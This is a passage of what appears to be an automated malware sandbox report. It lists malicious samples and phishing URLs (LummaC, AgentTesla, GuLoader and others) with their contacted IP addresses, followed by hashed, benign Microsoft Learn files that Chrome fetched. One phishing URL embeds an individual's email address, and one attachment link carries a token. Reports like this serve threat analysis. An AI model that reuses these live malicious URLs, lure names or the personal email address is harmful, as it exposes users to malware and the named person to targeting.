                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        https://p17.zdusercontent.com/attachment/2445389/ryxRPz33gKl8WOlTwGzflhJW0?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..tPZhCDORqs9nCyAS3-minw.9z3pWgn4Sz30qgGvyMMBBcsemXZM94aTMxuVYlLHSYy7Xq8skb3EbXl6bv7fV5Qkmu4Abj6bctF3IDwoEEEyQSYE7VxJUpxhgO115XWVlebe2RMnKsMVgBk1EGwr8YR_orFfcKLNhuzw2YBwHcjgIZ_kiWTRCq2oS5Y-limkxLFt2Gzz7z2_Nor6lDgydCqlW0bhDoMQLVi9gocjgjLVIsJQvuLQUGm-EdBcHgzSSkvqIkftI9-NC1TXgguzcfGBPBVIDheIwH9u_82JOUhjUrKwUX_Xa39JZI-pokQ9N94.hzvnxsPxKdvzyHbwAz8LHgGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eOrder requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        https://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                        • 40.113.110.67
                                                                                                                                                                        • 40.113.103.199
                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        No context
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):19696
                                                                                                                                                                        Entropy (8bit):7.9898910353479335
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                        MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                        SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                        SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                        SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                        Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):47062
                                                                                                                                                                        Entropy (8bit):5.016115705165622
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                        MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                        SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                        SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                        SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                        Encrypted:false
